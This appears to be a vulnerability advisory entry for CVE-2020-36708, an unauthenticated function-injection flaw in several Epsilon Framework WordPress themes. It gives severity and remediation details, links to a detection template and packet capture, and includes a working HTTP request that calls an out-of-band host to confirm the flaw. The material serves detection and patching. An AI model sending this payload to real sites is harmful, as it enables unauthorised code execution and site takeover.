| Title | WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution |
|---|---|
| Author | madrobot |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary code remotely, leading to full site compromise. |
| Remediation | Update themes to the latest versions where the vulnerability is fixed or apply security patches provided by theme developers. |
| CVSS Score | 9.8 |
| EPSS Score | 0.90488 |
| CVE ID | CVE-2020-36708 |
| CWE ID | CWE-94 |
| Tags | wordpress rce cve cve2020 edb wpscan vkev vuln |
WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection caused by epsilon_framework_ajax_action, letting unauthenticated attackers call functions and achieve remote code execution, exploit requires no authentication.
POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36708.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-36708.pcap
N/AN/A